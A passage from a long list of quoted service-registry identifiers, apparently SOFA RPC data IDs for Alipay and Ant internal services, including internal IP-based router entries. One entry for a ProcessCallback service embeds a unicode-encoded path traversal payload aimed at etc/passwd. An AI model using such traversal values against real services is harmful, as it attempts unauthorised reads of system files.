","com.alipay.developerops.facade.api.MessageActiveDeliveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instsign.common.service.facade.b2b.B2bServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoCallService:1.0:pointprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:instEvaluateUpdate_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.FundTradeRzoneSwitchDrm.loadTestZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.trigger.ChangeRiskCheckRegister:1.0:checkroute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-TEST002_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appstore.common.service.facade.commodity.AppstoreWhiteListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.core.basic.RegexCheckManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.touchpoint.TouchPointManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.211.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icif.service.facade.api.UserActionLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.video.VideoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.PvSofaService:1.0:current_idc_other_zone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FININFO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordermng.common.service.api.orderlink.OrderLinkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.facade.ChannelDispatchService:1.0:pushcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.table.ShopTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.bumng.bumngDataSourceOB.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rtss.common.service.facade.TaskQualityControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.mdata.auto.daointerface.MdataAccountSettleMonthDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linka.common.service.facade.ccm.CCMFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antrecluse.facade.service.sample.OracleSampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.partner.repository.SfSysParamForMoneyRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.common.service.facade.charge.AntCloudOpenAppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.fundprod.facade.FundDisputeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.PluginSpecOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayLineStationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.ordercenter.facade.service.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.contract.ContractTemplateCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.189.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cstrategycenter.common.service.facade.MissionCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.117.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundmng.biz.shared.filesycho.facade.FundFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:ccrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.cacheType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.biz.service.webspi.controller.KbLeadsItemQueryWarpperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityNgoGZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtFnaBizTypeCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverlesscore.YamlTestApi14Service1021071804:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:anteduprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.164.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.service.facade.api.tinyapp.TinyAppContentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.QueryPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:csmobile@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdiscount.common.service.facade.api.DiscountApplyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.business.mng.TargetLabelConfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-alittlepaytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.assets.AssetsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.core.service.innerclient.slaver.api.InnerClientSlaverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.groupchat.api.GroupChatFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ugstrategycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rcassetscenter.common.service.facade.api.RcGeneralLicenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.basementweb.PublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditinstallprod.common.service.jfq.JfqAgreementOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpromo.service.QueryCustomerLableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.apppackage.PackageAdminManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.shop.MrchProdShopPageQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.rights.RightsAmountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sdaruleengine.common.service.facade.api.IotRuleEngineWorkServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.minitemplatemsg.ServiceCodeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.MessageConsumService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.campaign.DstCampQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.scibase.facade.datamerge.DataMergeRestFacade:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.insmobile.drm.InsRenderDrmClient.renderConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.riskmng.common.service.facade.api.TaskInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openitemcore.common.service.facade.api.management.material.ServiceMaterialMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.177.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdalhbase:name=com.alipay.zdal.ldc.hbase.antfeatureflow.update,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.core.function.dal.service.UDFDALService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.FundEstimateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SceneGroupFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbbusinessprod.common.service.facade.api.ShopPayeeAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promorulecenter.common.service.facade.PromoRuleAnalyzeService:1.0:ucdpservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trade.ext.service.api.TradeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.87.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:cscheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.common.facade.ApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_EM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:apshopcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.RateLimitManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.service.SecuredZoneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unimetaservice.facade.api.ModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.recon.ReconResultQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:salesTaskCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditauthprod_auxiliary_task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionSellFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CIFMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.mpoint.facade.MpointAccountDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.core.service.bind.AlipayAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.FinacGeneralVchrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.GuessActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_4006_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finorm.finriskcenter.common.facade.api.guardian.ImmuneModelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.thor.service.ThorLineageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.business.spi.BusinessOpConfigConsultCallbackFacade:1.0:imtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.QrCodeExpireTimeConfigResource.expireTime,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mbuyer.common.service.facade.cart.UserVoucherInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.integration.instradeprod.InsApplicationAcceptanceFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.ShopLayoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskscan.service.common.service.facade.RiskScanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.wagu.api.VIFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.home.rest.SdkConfigDebugRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.cif.client.drm.NearDataTairRouterSwitcher.shadowModelBlackConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxconf.service.facade.ctrl.DataSvnCommitService:1.0:fluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.bcriskcaptcha.facade.api.AntCaptchaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.virtualtable.service.ComputeTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.12.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.whiteCmdExpressions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:ctoken@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_aldata_schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.rate.triple.RatePortalEntryTriple:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityDayuReportDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iriskperceptcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbaudit.common.service.facade.audit.ItemExclusiveAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.venue.BackstageVenueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcore.common.service.facade.api.ConsumeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mrchstoreapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_PCREDITBILL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.rate.triple.RatePortalMessageTriple:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.explorerEm14DataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revol.core.service.facade.ScriptChecker:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yfd.core.service.ds.mng.querymeta.service.QueryTableMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.almcenter.service.facade.api.recommendedplan.RecommendedPlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.task.ProjectViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.streammedia.common.service.facade.SmLiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.common.service.facade.cds.ContentFacade:1.0:ucdpcore-finance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mrchprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttune.common.service.facade.frontend.TuneService:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.department.DepartmentService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.RenewalExclusiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardInterestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.InspectionPartnerManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexclienttrdcenter.service.facade.api.PricingAmountConfirmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.facade.ScorpioMindMapDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.AssetConsultService:1.0:instpayAssetConsultService12@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.accessinfo.AccessInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.totalTagIdStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rinsight.common.base.spi.RinsightModelFactoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.indicator.FqpQcIndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_EC-pcreditbatch-SendClearingMessage#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promobench@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.mall.MallVoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.base.service.FinsignMYBKAccountIdentifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.apply.ApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.alipmc.api.ProcessRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.material.InsIopMaterialMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaIMatchFacadeAdDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.FilePolicyService:1.0:filePolicyService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.datasource.config.DataSourceConfig.dataSourceIndexEnd,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.amc.service.AmcResourceFacede:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.article.LifeContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.adapt.CsWorkTaskManageService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdminMediaContractServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SOFA-CORE-DEMO#@#DEFAULT_INSTANCE_ID#@#SOFA","bkopenplatform.facade.UnifygwService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradefront.service.refund.api.RefundAfterTradeCompletedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_YEBB#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_COMMANDCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.154.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.test.sub02:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.148.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxconf.service.facade.ctrl.DataClientFetchService:1.0:fluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.submit.SubmitRecordApi:1.0:dppublishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.assetflux.service.api.RefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.riskmng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.idpatrol.biz.shared.statistic.MapStatistic:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.treasurebag.rule.service.DataDictionaryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.acprovisioncore.common.facade.workspace.WorkspaceFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeAliMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_DEFINFUND_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-koiteste@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.128.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.management.grayctrl.GrayCtrlRuleConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.localZdalproxy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.166.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.26.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.product.spi.Validator:1.0:securityidentify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.PromoLandingPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTMEMBER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:addp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepRightsBizFacade:1.0:antcommonweal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:mif_app_asset_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.59.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.19.28.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.accordercore.common.service.facade.control.auth.api.AuthOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.FramePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.biz.price.service.Apportion3PartyCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_PHONE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.investtrade.facade.api.security.SecurityDeal